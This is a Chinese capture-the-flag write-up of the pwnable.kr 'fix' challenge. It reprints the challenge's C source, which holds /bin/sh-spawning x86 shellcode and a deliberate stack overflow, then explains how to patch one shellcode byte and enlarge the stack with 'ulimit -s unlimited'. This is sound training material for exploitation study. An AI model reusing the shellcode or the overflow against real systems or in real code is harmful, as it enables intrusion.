pwnable.kr之fix

#include <stdio.h>

// 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void shellcode(){
        // a buffer we are about to exploit!
        char buf[20];

        // prepare shellcode on executable stack!
        strcpy(buf, sc);

        // overwrite return address!
        *(int*)(buf+32) = buf;

        printf("get shell\n");
}

int main(){
        printf("What the hell is wrong with my shellcode??????\n");
        printf("I just copied and pasted it from shell-storm.org :(\n");
        printf("Can you fix it for me?\n");

        unsigned int index=0;
        printf("Tell me the byte index to be fixed : ");
        scanf("%d", &index);
        fflush(stdin);

        if(index > 22)  return 0;

        int fix=0;
        printf("Tell me the value to be patched : ");
        scanf("%d", &fix);

        // patching my shellcode
        sc[index] = fix;        

        // this should work..
        shellcode();
        return 0;
}

看代码, 使用了一段有效的shellcode但是执行失败, gdb跟进去发现是因为esp接近shellcode存放区域, 调用push指令破坏了shellcode.

1. xor %eax,%eax
2. push %eax
3. push $0x68732f2f
4. push $0x6e69622f
5. mov %esp,%ebx
6. push %eax
7. push %ebx
8. mov %esp,%ecx
9. mov $0xb,%al
10. int $0x80

由于只能改一位, 需要修改的是6. push eax(即偏移15), 网上查到说leave指令可以, 但是测试发现无效, pop esp显然有效, 可以极大修改esp的值, 测试无效. 最后查writeup发现需要修改栈的范围

ulimit -s unlimited

这一点确实没想到, 也使得这种解法在此处有所瑕疵